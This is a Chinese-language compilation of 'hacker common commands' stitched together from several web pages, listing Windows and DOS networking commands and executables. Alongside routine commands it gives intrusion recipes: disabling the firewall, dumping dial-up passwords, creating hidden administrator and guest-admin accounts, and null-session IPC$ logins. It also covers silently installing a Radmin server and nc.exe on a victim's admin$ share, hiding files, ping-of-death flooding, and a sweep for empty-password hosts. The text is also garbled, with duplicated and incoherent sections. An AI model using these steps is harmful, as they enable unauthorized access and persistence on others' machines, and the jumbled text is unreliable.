黑客计算机常用命令大全
黑客常用命令
以下列出在NT系统中基本的网络命令和使用方法:一、ipconfig命令:ipconfig命令应该是最最基础的命令了,主要功能就是显示用户所在主机内部的IP协议的配置信息等资料。
它的主要参数有:all:显示与TCP/IP协议相关的所有细节信息,其中包括测试的主机名、IP地址、子网掩码、节点类型、是否启用IP路由、网卡的物理地址、默认网关等。
renew all:更新全部适配器的通信配置情况,所有测试重新开始。
release all:释放全部适配器的通信配置情况。
renew n:更新第n号适配器的通信配置情况,所有测试重新开始。
例如:C:\>ipconfigWindows IP ConfigurationEthernet adapter 本地连接:Connection-specific DNS Suffix . :IP Address. . . . . . . . . . . . : 192.168.0.14Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.0.1二、Net命令:Net命令主要是在windows NT平台中完成一些网络工作,它的功能非常强大,可以这么说如果你想学习windows平台下的网络安全,必须熟悉使用该命令。
该命令的语法很多,功能强大,我们只是介绍一些简单常用的。
1.建立IPC连接:只要你拥有某IP的用户名和密码,那就用IPC$做连接,这里我们假如你得到的用户是管理员administrator,密码是123456。
假设对方IP为192.168.0.1net use \\192.168.0.1\ipc$ "123456" /user:"administrator"一般会显示如下信息:C:\>net use \\192.168.0.1\ipc$ "123456" /user:"administrator"命令成功完成。
黑客键盘使用方法
黑客键盘使用方法导语:黑客键盘作为黑客工具的重要一环,具有强大的功能和灵活的操作方式。
本文将详细介绍黑客键盘的使用方法,包括快捷键、命令输入和常用功能等,帮助读者更好地利用黑客键盘进行操作和实施安全测试。
一、快捷键1. Tab键:在命令行中,Tab键用于自动补全命令和文件路径,提高输入效率。
2. Ctrl+C:用于终止当前运行的命令,相当于“结束任务”。
3. Ctrl+Z:将当前命令放到后台运行,可以使用“fg”命令将其重新调回。
4. Ctrl+D:退出当前会话或终止当前进程。
5. Ctrl+Alt+Del:强制重启计算机,常用于解决系统死机或无响应问题。
6. Ctrl+Shift+Esc:打开任务管理器,可以查看和关闭正在运行的程序。
二、命令输入1. 常用命令:(1)ping:用于测试网络连通性,检测目标主机是否在线。
(2)tracert:用于跟踪数据包在网络中的路径,分析网络延迟和故障。
(3)netstat:用于查看网络连接、监听端口和网络统计信息。
(4)ipconfig:用于查看和配置网络接口信息,包括IP地址、子网掩码等。
(5)nslookup:用于查询域名对应的IP地址或反向查询。
2. 命令参数:(1)-h:显示命令的帮助信息。
(2)-a:显示完整的信息,包括IP地址、主机名等。
(3)-n:以数字形式显示结果,不进行域名解析。
(4)-r:刷新DNS缓存,更新域名解析信息。
三、常用功能1. 端口扫描:使用黑客键盘可以通过输入命令扫描目标主机的开放端口,以便发现系统漏洞和安全风险。
2. 暴力破解:黑客键盘可以通过输入命令进行用户名和密码的暴力破解,测试目标系统的安全性。
3. 木马植入:黑客键盘可以通过输入命令植入木马程序,实现对目标主机的远程控制和信息窃取。
4. 数据包嗅探:通过黑客键盘输入相应命令,可以监听网络数据包,获取目标主机的敏感信息。
5. 漏洞利用:黑客键盘可以输入命令调用已知漏洞的利用工具,攻击目标系统,实现权限提升和系统入侵。
黑客常用Cmd命令
cmd.exe是一个命令扩展接口,外面利用它可以执行系统的环境变量下的任意可执行程序,操作类似与以前的ms-dos,但功能却比ms-dos要强大的多,虽然学习有点抽象,但我们只要把ms-dos的基础打好,也很容易上手,如果各位对dos命令很陌生的话,就先去补习一下dos命令再来看本文,如果文章前那位是位system高手,就请掠过次页吧,好了不多说废话,请看下面:一、外部命令:1、 atmadm.exe:打开ATM调用管理器,-c表示列出所有连接、-s表示只显示统计、-a表示列出所有注册的连接地址。
2、 arp.exe:查看和修改本地ARP(地址解析协议)表项命令,/a 显示当前网络接口和当前的ARP表、/d 删除指定的IP的ARP表、/s 添加有IP地址和MAC地址指定的ARP表。
在使用ARP命令是通常是先PING 对方或网关的IP地址。
3、 attrib.exe:文件属性设置,+代表设置属性、-代表取消属性、/s代表设置当前目录和子目录文件(支持通配符)、/d代表设置文件夹(支持通配符),设置选项如下:a 存档属性、s 系统属性、h 隐藏属性、r 只读属性。
比如给c:\windows所有目录及子目录加系统、隐藏属性,命令如下:attrib +s +dc:\windows\*.* /s /d 。
4、 auditusr.exe:设置每用户审核策略,/is 添加或更改成功策略审核、/if 添加或更改失败策略审核、/r 删除所有安全策略审核、/ra 删除所有用户策略审核、/e 将当前用户策略审核配置导出到文件、/i 从文件导入用户策略审核配置。
5、 blastcln.exe:微软的恶意程序移除工具命令行程序,只有/v参数,运行后会检测系统服务、系统程序、注册表启动项、被病毒破坏或丢失的文件名等等。
检测完毕之后会给出报告。
6、 bootcfg.exe:系统启动项配置程序,考虑到参数众多又对外面无多么大实际作用,大家可以输入bootcfg.exe /?参见其的中文命令参数帮助。
黑客常用命令
命令 arp-a arp-a***.***.*.***物理地址 arp-d***.***.*.*** attrib文件名+A+R+S+H attrib 文件名-A-R-S-H attrib文件名(项目名) dir dir/Q dir/T:A dir/T:C dir/T:W find 文件名 ipconfig ipconfig/all nbtstat-a***.***.*.*** nbtstat-a 计算机名 nbtatat-n nbtatat-s net config net localgroup abc 123/add net pause 服务名 net send***.***.*.***“文本信息” net share net share c$/del net share ipc$ net share ipc$/del net start net start 服务名 net stop 服务名 net time***.***.*.*** net use\\***.***.*.***\IPC$ net use\\***.***.*.***\IPC$/del net user net user abc 123/add net user guest/active:yes net user guest 123 net user guest/time:all net user 用户名/delete net view net view***.***.*.*** netstat-a netstat-n netstat-s pause ping***.***.*.***(或域名) 命令解析 查看高速缓存中的项目 向arp项目高速缓存中输入一个静态项目 删除一个项目 添加某文件的存档,只读,系统,隐藏属性 去掉某文件的存档,只读,系统,隐藏属性 查看某文件(项目)的属性 查看文件 显示文件及目录属系统那个用户 显示文件上次被访问时间 显示文件创建时间 显示上次被修改时间 查找某文件 查看本地IP地址 显示全部配置信息 列出指定IP地址的远程机器名称表 列出指定计算机名的远程机器名称表 列出本地NetBIOS名称 列出具有目标IP地址的会话表 显示系统网络设置 把用户abc加入到Administrator组 停止某服务 向IP地址***.***.*.***的电脑发送信息 查看当前电脑开启的共享 删除C盘共享 开启ipc$共享 删除ipc$共享 查看开启了哪些服务 开启服务 停止某服务 查看IP地址为***.***.*.***的电脑上的时间 与IP地址为***.***.*.***的电脑建立IPC空链接 删除与IP地址为***.***.*.***的电脑建立的IPC空链接 查看电脑中有哪些用户 添加一个用户名为abc,密码为123的用户 将guest 用户激活 把guest 的密码改为123 没有登录时间限制 删掉用户 查看本地局域网内开启了哪些共享 查看IP地址为***.***.*.***的电脑开放了那些共享 查看开启了哪些端口 查看端口的网络连接情况 查看正在使用的所有协议使用情况 暂停批处理程序 向对方主机发送默认大小为32字节的数据
很全的黑客常用DOS命令
grep 在档案中查找字符串
diff 档案文件比较
find 档案搜寻
date 现在的日期、时间
who 查询目前和你使用同一台机器的人以及Login时间地点
w 查询目前上机者的详细资料
whoami 查看自己的帐号名称
groups 查看某人的Group
(例:mysql -h110.110.110.110 -Uroot -P123456
注:u与root可以不用加空格,其它也一样)
exit 退出MYSQL
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。(注意:和上面不同,下面的因为是MYSQL环境中的命令,所以后面都带一个分号作为命令结束符)
cat 文件名 查看文件内容
cat >abc.txt 往abc.txt文件中写上内容。
more 文件名 以一页一页的方式显示一个文本文件。
cp 复制文件
mv 移动文件
rm 文件名 删除文件,rm -a 目录名删除目录及子目录
mkdir 目录名 建立目录
rmdir 删除子目录,目录内没有文档。
存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。
/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位);& 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。
黑客常用入侵命令
黑客常用入侵命令控制面版:运行>>>>>>>>>>>:control计算机管理:command MMC结束XP防火墙进程:net stop sharedaccess查看ADSL帐号密码的代码:dialupass /allusers /stext "c:\pass.txt启动3389服务:net start TermService关闭所有防火墙的代码:cmd.exe /c net stop sharedaccessiis命令重启:iisreset /reboot用CMD命令实现路由跟踪:tracert 域名(如:)结束进程:NET SHARE查看版本:ver查看中端(服务):net start查看文件:dir查看3389:加用户:c:\winnt\system32>net user adminserver$ admin /add提权限:net localgroup administrators adminserver$ /add211.38.172.2 2180查看用户net user远程连接到主机CMD命令:telnet 主机IP踢人:logoff ID查看当前人:query user打开telnet:net start telnettelnet连接工具:OpenTelnet删除共享:net share c$=c:\删除共享:net share c$ /del启用GUEST:net user guest /active:yes为GUEST设密码:net user guest 888888提升到管理员:net localgroup "Administrators" guest /add超级用户隐藏器:c:\door adminserver$:admin克隆帐号:ca \\IP 你建立的帐号密码肉机默认帐号密码ca \\127.0.0.1 adminserver$ admin adminserver admin完全禁止系统模认工享[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComput er\NameSpace\DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}]3389替换服务-----------------------中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]c:\winnt\system32\copy termsrv.exe service.exec:\winnt\system32\cd..c:\winnt\sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe端口转向:f:\web\ftp.exe "c:\fpipe.exe -v -l 开放的端口-r 要转向的端口ip"使用空口令连接:net use \\对方IP\ipc$ "" /user:"administrator"(在上传文件的目录下)远程复制文件:c:\radmin>net use \\a-01\ipc$ "12345" /user:administratorc:\ramdin>copy r_server.exe \\a-01\admin$\system32c:\ramdin>copy radmin.reg \\a-01\admin$\sytem32在对方CMD下:c:\winnt\system32\>regedit /s radmin.regc:\winnt\system32\>r_server.exe /install /silenecnet start r_servercopy r_server.exe \\对方IP\admin$\system32c:\opentelnet.exe \\IP ADMINISTRATOR "" 0 90copy 文件名\\IP\admin$\system32进入对方CMD:c:\opentelnet.exe \\Ip administrator "" 0 90登陆CMD:c:\telnet IP 90安装RADMIN:c:\winnt\system32\r_server /install silencec:\winnt\system32\r-server导入注册表:c:\winnt\system32\regedit.exe /s aaa.reg看端口:c:\winnt\system32\netstat -an改端口:c:\winnt\system32\r_server.exe /port:1024 /pass:1234 /save /silence起动服务:c:\winnt\system32\net start r_server隐藏文件:c:\winnt\system32\attrib.exe +h r_server.exe +h%systemroot$\system32看看共享开了没有,没有的话把共享开开c:\winnt\system32>net share清单是空的。
黑客常用命令大全
接下来就要介绍具体命令的使用方法了。
dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。
下面我们举个例子来说明一下具体用法。
这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。
三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。
-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。
这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。
建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \192.168.0.7admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。
net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。
然后在提示符下键入open IP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的。
当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的。
史上最全cmd命令大全黑客必备
cmd常用命令大全 cmd运行命令cmd常用命令大全2K和XP下的CMD命令accwiz.exe > 辅助工具向导acsetups.exe > acs setup dcom server executable actmovie.exe > 直接显示安装工具append.exe > 允许程序打开制定目录中的数据arp.exe > 显示和更改计算机的ip与硬件物理地址的对应列表at.exe > 计划运行任务atmadm.exe > 调用管理器统计attrib.exe > 显示和更改文件和文件夹属性autochk.exe > 检测修复文件系统autoconv.exe > 在启动过程中自动转化系统autofmt.exe > 在启动过程中格式化进程autolfn.exe > 使用长文件名格式bootok.exe > boot acceptance application for registry bootvrfy.exe > 通报启动成功cacls.exe > 显示和编辑aclcalc.exe > 计算器cdplayer.exe > cd播放器change.exe > 与终端服务器相关的查询charmap.exe > 字符映射表chglogon.exe > 启动或停用会话记录chgport.exe > 改变端口(终端服务)chgusr.exe > 改变用户(终端服务)chkdsk.exe > 磁盘检测程序chkntfs.exe > 磁盘检测程序cidaemon.exe > 组成ci文档服务cipher.exe > 在ntfs上显示或改变加密的文件或目录cisvc.exe > 索引容ckcnv.exe > 变换cookiecleanmgr.exe > 磁盘清理cliconfg.exe > sql客户网络工具clipbrd.exe > 剪贴簿查看器clipsrv.exe > 运行clipboard服务clspack.exe > 建立系统文件列表清单cluster.exe > 显示域的集群_cmd_.exe > 没什么好说的!cmdl32.exe > 自动下载连接管理cmmgr32.exe > 连接管理器cmmon32.exe > 连接管理器监视cmstp.exe > 连接管理器配置文件安装程序comclust.exe > 集群comp.exe > 比较两个文件和文件集的容*compact.exe > 显示或改变ntfs分区上文件的压缩状态conime.exe > ime控制台control.exe > 控制面板convert.exe > 转换文件系统到ntfsconvlog.exe > 转换iis日志文件格式到ncsa格式cprofile.exe > 转换显示模式cscript.exe > 较本宿主版本csrss.exe > 客户服务器runtime进程csvde.exe > 日至格式转换程序dbgtrace.exe > 和terminal server相关dcomcnfg.exe > dcom配置属性dcphelp.exe > ?dcpromo.exe > ad安装向导ddeshare.exe > dde共享ddmprxy.exe >debug.exe > 就是debug啦!dfrgfat.exe > fat分区磁盘碎片整理程序dfrgntfs.exe > ntfs分区磁盘碎片整理程序dfs_cmd_.exe > 配置一个dfs树dfsinit.exe > 分布式文件系统初始化dfssvc.exe > 分布式文件系统服务器diantz.exe > 制作cab文件diskperf.exe > 磁盘性能计数器dllhost.exe > 所有com+应用软件的主进程dllhst3g.exe >dmadmin.exe > 磁盘管理服务dmremote.exe > 磁盘管理服务的一部分dns.exe > dns applications dnsdoskey.exe > 命令行创建宏dosx.exe > dos扩展dplaysvr.exe > 直接运行帮助drwatson.exe > 华生医生错误检测drwtsn32.exe > 华生医生显示和配置管理dtcsetup.exe > installs mdtcdvdplay.exe > dvd播放dxdiag.exe > direct-x诊断工具 edlin.exe > 命令行的文本编辑器(历史悠久啊!)edlin.exe > 命令行的文本编辑器(历史悠久啊!)esentutl.exe > ms数据库工具eudcedit.exe > type造字程序eventvwr.exe > 事件查看器evnt_cmd_.exe > event to trap translator; configuration toolevntwin.exe > event to trap translator setupexe2bin.exe > 转换exe文件到二进制expand.exe > 解压缩extrac32.exe > 解cab工具fastopen.exe > 快速访问在存中的硬盘文件faxcover.exe > 传真封面编辑faxqueue.exe > 显示传真队列faxsend.exe > 发送传真向导faxsvc.exe > 启动传真服务fc.exe > 比较两个文件的不同find.exe > 查找文件中的文本行findstr.exe > 查找文件中的行finger.exe > 一个用户并显示出统计结果fixmapi.exe > 修复mapi文件flattemp.exe > 允许或者禁用临时文件目录fontview.exe > 显示字体文件中的字体forcedos.exe > forces a file to start in dos mode. 强制文件在dos模式下运行freecell.exe > popular windows game 空当接龙ftp.exe > file transfer protocol used to transfer files over a networ k connection 就是ftp了gdi.exe > graphic device interface 图形界面驱动grovel.exe >grpconv.exe > program manager group convertor 转换程序管理员组help.exe > displays help for windows 2000 commands 显示帮助hostname.exe > display hostname for machine. 显示机器的hostnameie4uinit.exe > ie5 user install tool ie5用户安装工具ieshwiz.exe > customize folder wizard 自定义文件夹向导iexpress.exe > create and setup packages for install 穿件安装包iisreset.exe > restart iis admin service 重启iis服务internat.exe > keyboard language indicator applet 键盘语言指示器ipconfig.exe > windows 2000 ip configuration. 察看ip配置ipsecmon.exe > ip security monitor ip安全监视器ipxroute.exe > ipx routing and source routing control program ipx路由和源路由控制程序irftp.exe > setup ftp for wireless communication 无线连接ismserv.exe > intersite messaging service 安装或者删除service control manager中的服务jdbgmgr.exe > microsoft debugger for java 4 java4的调试器jetconv.exe > convert a jet engine database 转换jet engine数据库jetpack.exe > compact jet database. 压缩jet数据库jview.exe > command-line loader for java java的命令行装载者krnl386.exe > core component for windows 2000 2000的核心组件label.exe > change label for drives 改变驱动器的卷标lcwiz.exe > license compliance wizard for local or remote systems. 许可证符合向导ldifde.exe > ldif cmd line manager ldif目录交换命令行管理licmgr.exe > terminal server license manager 终端服务许可协议管理lights.exe > display connection status lights 显示连接状况llsmgr.exe > windows 2000 license manager 2000许可协议管理llssrv.exe > start the license server 启动许可协议服务器lnkstub.exe >locator.exe > rpc locator 远程定位lodctr.exe > load perfmon counters 调用性能计数logoff.exe > log current user off. 注销用户lpq.exe > displays status of a remote lpd queue 显示远端的lpd打印队列的状态,显示被送到基于unix的服务器的打印任务lpr.exe > send a print job to a network printer. 重定向打印任务到网络中的打印机。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
计算机命令大全黑客常用命令大全net user heibai lovechina /add --------加一个heibai的用户密码为lovechinanet localgroup Administrators heibai /add --------把他加入Administrator组net start telnet --------开对方的TELNET服务net use z:\127.0.0.1c$ --------映射对方的C盘net user guest /active:yes --------将Guest用户激活net user guest lovechina --------把guest的密码改为lovechinanet user --------查看所有用户列表net user --------用户名/delete 删掉net time \\127.0.0.1-------- 得到对方的时间,get c:\index.htm d:\ --------上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\copy index.htm \\127.0.0.1\c$\index.htm --------本地C盘下的index.htm复制到127.0.0.1的C 盘NET VIEW --------显示域列表、计算机列表计算机运行命令全集winver---------检查Windows版本wmimgmt.msc----打开windows管理体系结构wupdmgr--------windows更新程序winver---------检查Windows版本wmimgmt.msc----打开windows管理体系结构wupdmgr--------windows更新程序wscript--------windows脚本宿主设置write----------写字板winmsd-----系统信息wiaacmgr-------扫描仪和照相机向导winchat--------XP自带局域网聊天mem.exe--------显示内存使用情况Msconfig.exe---系统配置实用程序mplayer2-------简易widnows media playermspaint--------画图板mstsc----------远程桌面连接net use \\ip\ipc$ " /user:" " --------建立IPC空链接net use \\ip\ipc$ "密码"/user:"用户名" 建立IPC非空链接net use h: \\ip\c$ "密码"/user:"用户名" 直接登陆后映射对方C:到本地为H:net use h: \\ip\c$ --------登陆后映射对方C:到本地为H:net use \\ip\ipc$ /del --------删除IPC链接net use h: /del --------删除映射对方到本地的为H:的映射net user 用户名密码/add --------建立用户net user guest /active:yes --------激活guest用户net user --------查看有哪些用户net user 帐户名-------- 查看帐户的属性net localgroup administrators 用户名/add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数net start --------查看开启了哪些服务net start 服务名-------- 开启服务;(如:net start telnet,net start schedule)net stop 服务名--------停止某服务net time \\目标ip --------查看对方时间net time \\目标ip /set --------设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes 可取消确认信息net view --------查看本地局域网内开启了哪些共享net view \\ip --------查看对方局域网内开启了哪些共享net config --------显示系统网络设置net logoff --------断开连接的共享net pause --------服务名暂停某服务net send ip --------"文本信息" 向对方发信息net ver --------局域网内正在使用的网络连接类型和信息net share --------查看本地开启的共享net share ipc$ --------开启ipc$共享net share ipc$ /del-------- 删除ipc$共享net share c$ /del --------删除C:共享net user guest 12345 --------用guest用户登陆后用将密码改为12345net password 密码--------更改系统登陆密码netstat -a --------查看开启了哪些端口,常用netstat -annetstat -n --------查看端口的网络连接情况,常用netstat -annetstat -v --------查看正在进行的工作netstat -p 协议名-------- 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)netstat -s --------查看正在使用的所有协议使用情况nbtstat -A ip --------对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写tracert -参数ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)kill -F 进程名加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)del -F 文件名加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件mplayer2-------媒体播放机magnify--------放大镜实用程序mmc------------打开控制台mobsync--------同步命令dxdiag---------检查DirectX信息drwtsn32------ 系统医生devmgmt.msc--- 设备管理器dfrg.msc-------磁盘碎片整理程序diskmgmt.msc---磁盘管理实用程序dcomcnfg-------打开系统组件服务ddeshare-------打开DDE共享设置dvdplay--------DVD播放器net stop messenger-----停止信使服务net start messenger----开始信使服务notepad--------打开记事本nslookup-------网络管理的工具向导ntbackup-------系统备份和还原narrator-------屏幕"讲述人"ntmsmgr.msc----移动存储管理器ntmsoprq.msc---移动存储管理员操作请求netstat -an----(TC)命令检查接口syncapp--------创建一个公文包sysedit--------系统配置编辑器sigverif-------文件签名验证程序sndrec32-------录音机shrpubw--------创建共享文件夹secpol.msc-----本地安全策略syskey---------系统加密,一旦加密就不能解开,保护windows xp系统的双重密码services.msc---本地服务设置Sndvol32-------音量控制程序sfc.exe--------系统文件检查器sfc /scannow---windows文件保护Nslookup-------60秒倒计时关机命令tourstart------xp简介(安装完成后出现的漫游xp程序)taskmgr--------任务管理器eventvwr-------事件查看器eudcedit-------造字程序explorer-------打开资源管理器packager-------对象包装程序perfmon.msc----计算机性能监测程序progman--------程序管理器regedit.exe----注册表rsop.msc-------组策略结果集regedt32-------注册表编辑器rononce -p ----15秒关机regsvr32 /u *.dll----停止dll文件运行regsvr32 /u zipfldr.dll------取消ZIP支持cmd.exe--------CMD命令提示符chkdsk.exe-----Chkdsk磁盘检查certmgr.msc----证书管理实用程序calc-----------启动计算器charmap--------启动字符映射表cliconfg-------SQL SERVER 客户端网络实用程序Clipbrd--------剪贴板查看器conf-----------启动netmeetingcompmgmt.msc---计算机管理cleanmgr-------**整理ciadv.msc------索引服务程序osk------------打开屏幕键盘odbcad32-------ODBC数据源管理器oobe/msoobe /a----检查XP是否激活lusrmgr.msc----本机用户和组logoff---------注销命令iexpress-------木马捆绑工具,系统自带Nslookup-------IP地址侦测器fsmgmt.msc-----共享文件夹管理器utilman--------辅助工具管理器gpedit.msc-----组策略。